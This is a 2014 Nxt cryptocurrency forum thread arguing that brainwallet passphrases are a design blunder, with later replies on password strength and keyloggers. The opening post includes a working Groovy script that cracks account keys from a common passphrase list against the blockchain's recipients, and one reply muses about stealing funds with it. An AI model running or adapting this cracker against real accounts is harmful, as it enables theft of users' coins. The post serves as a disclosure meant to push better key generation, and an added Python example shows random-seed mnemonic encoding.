Topic: brainwallets need to go

Offline doctorevil

brainwallets need to go
« on: January 27, 2014, 03:01:54 PM »
Code:
import java.io.*;
def objIn = new ObjectInputStream(new FileInputStream("transactions.nxt"));
objIn.readInt();
def accounts = new HashSet();
objIn.readObject().each{
    accounts.add(Nxt.convert(it.value.recipient).toString());
}
BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in));
while ((line = stdin.readLine()) != null ) {
    def user = new Nxt.User();
    def accountId = user.initializeKeyPair(line);
    if ( accounts.contains(accountId.toString()) ) {
        System.out.println("found " + accountId + " " + line);
    }
}

This 15-line groovy single-threaded cracker recovers about 1.5% of all keys ever used in less than an hour using a common passphrase list.

IMHO NXT has a lot of good ideas, but its brainwallet-based key management solution is a near unforgivable design blunder.

Blaming users who get their NXT stolen for picking a bad passphrase is a bit of a cop-out.  The design forces people to run with scissors.  Best practice is to generate keys on behalf of users that satisfy standard entropy requirements.  If you want the output to be friendly looking use electrum-style mnemonic encoding.  The standard counter-argument is that this forces users to write their passphrase down or save it to a file instead of remembering it.  Humans are so bad at recalling/picking passphrases and cracking is so easy (and getting easier) that this is clearly the lesser of two evils.  Especially so because many otherwise technically sophisticated users are prone to conflate passphrase length with security.

Brainwallets are nifty conceptually, but they belong as a power-user feature.  Not the default.  A default key management solution that dooms 1.5% (probably more if I ran the cracker on a larger list) of users out of the gate is a huge problem.

Some may question if it's ethical to post this code as opposed to simply arguing my case; here's my thinking:
  • I wrote this as an exercise after seeing the recent reports of thefts, suspecting they were all caused by predictable passphrases (despite the victims claiming their passphrases were long) and wished to confirm this hypothesis.
  • There's value in showing cracking software is trivial - both as a warning to users to pick better passwords and an inducement to developers to change the default key management solution.
  • The fact that it's so trivial means I saved a would-be hacker all of 15 lines of work.
  • A total script kiddie without understanding of classpath bullshit still won't be able to run it so it's not like I'm unleashing 100% out of the box chaos.
Send all ransom payments to: NXT: 11046963052173795996 - BTC 13mSL7XMnyaHCvhkFPofX7gkQq2Bk7SoyB
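
Added example (not part of doctorevil's post or of any Nxt client): a Python illustration of the approach the post recommends, where key material is drawn from the OS CSPRNG and then encoded as words with a short checksum so that a written-down copy can be verified. The 2048-token wordlist is constructed for this example, and the 11-bits-per-word layout is an assumption, not Electrum's actual scheme or dictionary.

```python
import hashlib
import secrets

# Constructed stand-in wordlist (assumption): 16 * 8 * 16 = 2048 tokens, 11 bits each.
# A real client would ship a curated dictionary of ordinary words instead.
CONS = "bdfghjklmnprstvz"
VOWELS = ["a", "e", "i", "o", "u", "ai", "ea", "ou"]
WORDS = [a + v + b for a in CONS for v in VOWELS for b in CONS]
INDEX = {w: i for i, w in enumerate(WORDS)}


def generate_seed(nbytes=16):
    """Key material comes from the OS CSPRNG, never from a phrase a human picked."""
    return secrets.token_bytes(nbytes)


def encode(seed):
    """Seed bytes -> words, with one checksum bit appended per 32 seed bits."""
    if len(seed) % 4 or not 16 <= len(seed) <= 32:
        raise ValueError("seed must be 16, 20, 24, 28 or 32 bytes")
    cs_bits = len(seed) // 4
    checksum = hashlib.sha256(seed).digest()[0] >> (8 - cs_bits)
    n = (int.from_bytes(seed, "big") << cs_bits) | checksum
    count = (len(seed) * 8 + cs_bits) // 11
    return " ".join(WORDS[(n >> (11 * i)) & 0x7FF] for i in reversed(range(count)))


def decode(phrase):
    """Words -> seed bytes; ValueError on bad length, unknown word or checksum."""
    words = phrase.lower().split()
    if len(words) not in (12, 15, 18, 21, 24) or any(w not in INDEX for w in words):
        raise ValueError("wrong word count or unknown word")
    n = 0
    for w in words:
        n = (n << 11) | INDEX[w]
    cs_bits = len(words) * 11 // 33
    seed = (n >> cs_bits).to_bytes((len(words) * 11 - cs_bits) // 8, "big")
    if encode(seed) != " ".join(words):
        raise ValueError("checksum mismatch: phrase was copied incorrectly")
    return seed


if __name__ == "__main__":
    seed = generate_seed()
    phrase = encode(seed)
    print(phrase)
    print(f"round trip ok: {decode(phrase) == seed}, entropy: {len(seed) * 8} bits")
```

The entropy is fixed by the generator (128 bits for the default 16-byte seed) regardless of how the phrase looks, which is the property a user-chosen passphrase cannot guarantee.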

Offline hughmanwho

Re: brainwallets need to go
« Reply #1 on: January 27, 2014, 07:56:58 PM »
I agree that this is a big issue.  The new clients coming out should allow using any password but have some kind of feature like this, similar to the way blockchain.info manage their wallets.

Also, if I were you I'd remove that program.. it clearly is a relatively easy to write program but there are people out there who I could see downloading it and running who otherwise might not go to the trouble of writing their own.  Point is made that you were able to make a fairly simple program within a couple hours that can steal passphrases.  Honestly, since no one would ever know I stole the money.. I'm tempted to do it myself.
Please send Nxt: 5409832991870808944

Offline hoolio

Re: brainwallets need to go
« Reply #2 on: January 28, 2014, 01:57:19 PM »
Do I need to compile this code to run it?  ;D

Offline Zahlen

Re: brainwallets need to go
« Reply #3 on: February 02, 2014, 10:34:07 PM »
Thanks for doing this doctorevil. It's a good thing (despite your nick ;D) we know about this so early.

As I understand it, the design philosophy has been to keep the protocol clean, and place protections in the clients instead. Hence e.g. the lack of address checksums, 2FA support in the protocol. Trouble is the protocol came first with a basic, unprotected reference client. People then bought into a beta, some accepted the associated risks with that and did their homework first, some didn't. And it takes time after that for more advanced clients to be developed. The client devs have been working on ways to strengthen passwords, e.g. key stretching, wallet-like key file.

I started a wiki page on how to generate strong passwords, but it seems to have not received much attention. Would appreciate it if folks pointed more people to it, since I don't have time to trawl so many forums. And would also appreciate edits and comments in the discussion page.
Tips and donations are much appreciated.
NXT: 7436197154535225138  (alias: zahlen)     BTC: 1EdRTqqU4trAu1uPywwDxjyS3ewuRRHwfn
Learn how to create a strong password.

Offline farl4bit

Re: brainwallets need to go
« Reply #4 on: February 02, 2014, 10:50:52 PM »
What are the alternatives to the current brainwallets?  ???
https://twitter.com/Nxtgids | Donations: 7582598942095085392 | Nxt Startpagina.nl

Offline ZeroTheGreat

Thread: Main
« Reply #5 on: February 03, 2014, 05:32:58 PM »
Quote
What are the alternatives to the current brainwallets?  ???

Only the NRS client is trustworthy enough for me for now. So no alternatives (in my estimation). Keep waiting.

Offline EmpireCloud

Re: brainwallets need to go
« Reply #6 on: February 03, 2014, 09:00:38 PM »
Thanks Dr. Evil, your post makes the problem quite clear.

In my own situation, I'm not expecting to be able to spend my NXT on real world stuff for a few months yet, so I can make a strong password and then not access my account till then.

The problem comes with forging. At the moment I'm not forging because I don't want to type in that password every time I turn on my computer because if I have a keylogger or something then it's a certainty my NXT will get stolen.

I guess in future there will be other alternatives & things similar to armory where you can log in offline etc. to help with that.

Offline CryptKeeper

Re: brainwallets need to go
« Reply #7 on: February 03, 2014, 09:55:22 PM »
Thank you Dr. Evil for bringing this up. I think, this must be addressed asap!

Look how the solaris client implemented it, this is a good start! Waiting for the solaris source to be released, I am currently using the NRS client, so I had to manage security myself. I am using keepass like a bitcoin wallet and created a random 60-character-passphrase, which I paste into the NRS client and never type manually.

Maybe a bitcoin-wallet-type management of the passphrase is the way to go for Nxt...

Offline Come-from-Beyond

Re: brainwallets need to go
« Reply #8 on: February 03, 2014, 09:56:00 PM »
It's a cryptocurrency. People shouldn't use things they don't understand.

Offline farl4bit

Re: brainwallets need to go
« Reply #9 on: February 03, 2014, 11:36:42 PM »
Quote
It's a cryptocurrency. People shouldn't use things they don't understand.

???
But we want Nxt to be big and be used by the whole world? It should be user-friendly to get great acceptance.

Offline LemonAndFries

Re: brainwallets need to go
« Reply #10 on: February 03, 2014, 11:46:23 PM »
If a simple keylogger is your worry then do the following:

Create a TXT file somewhere you know is safe and doesn't have malware.
Send TXT file to your computer where you want to forge.
Every time you open your account, just copy and paste passphrase.
Keylogger will only log the clicks of your mouse.

If keyloggers have advanced much more, then someone can correct my info.
NXT: 10878087732491355406
NXT VPS node #1: 162.243.13.149 | NXT VPS node #2: 192.241.232.187

Offline TeamWealth

Re: brainwallets need to go
« Reply #11 on: February 03, 2014, 11:59:14 PM »
That really wouldn't work, lemonandfries. It would work vs the absolute most basic which just logs key strokes and mouse strokes, but useless vs more advanced which log a lot more including copy and paste. It really isn't that hard to intercept copy and paste actions.
NXT: 12309736827623275727

Offline LemonAndFries

Re: brainwallets need to go
« Reply #12 on: February 04, 2014, 12:25:16 AM »
Quote
That really wouldn't work, lemonandfries. It would work vs the absolute most basic which just logs key strokes and mouse strokes, but useless vs more advanced which log a lot more including copy and paste. It really isn't that hard to intercept copy and paste actions.

Yeah I'd figure that it could intercept the data also.  I'd still do it like that just in case the malware has a primitive keylogger.
Either way, people should have up to date malware removers and check their running processes for anything unusual.
It's not 100% protection, but it's better than doing nothing.

Offline ZeroTheGreat

Thread: Main
« Reply #13 on: February 04, 2014, 12:32:04 AM »
Quote
But we want Nxt to be big and be used by the whole world?

I dunno what you want; I want all users to have basic knowledge of the risks of an instrument such as cryptocurrency.

"You — your own bank".

Offline Leteu

Re: brainwallets need to go
« Reply #14 on: February 07, 2014, 10:28:08 PM »
Quote
If a simple keylogger is your worry then do the following:

Create a TXT file somewhere you know is safe and doesn't have malware.
Send TXT file to your computer where you want to forge.
Every time you open your account, just copy and paste passphrase.
Keylogger will only log the clicks of your mouse.

If keyloggers have advanced much more, then someone can correct my info.

This is total BS. ALL (software) keyloggers can capture the clipboard. This gives you no protection against keyloggers.

Far better would be to use this  (it's called neo safe keyboard)

http://www.aplin.com.au/neos-safekeys-v3/how-neos-safekeys-v3-works

and make sure you use drag and drop to transfer the password  (not inject "option" as that will allow the capture of password by keyloggers).